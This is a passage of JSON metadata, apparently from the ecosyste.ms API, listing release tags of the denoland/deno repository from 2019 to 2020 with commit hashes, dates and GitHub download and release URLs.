land/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/mani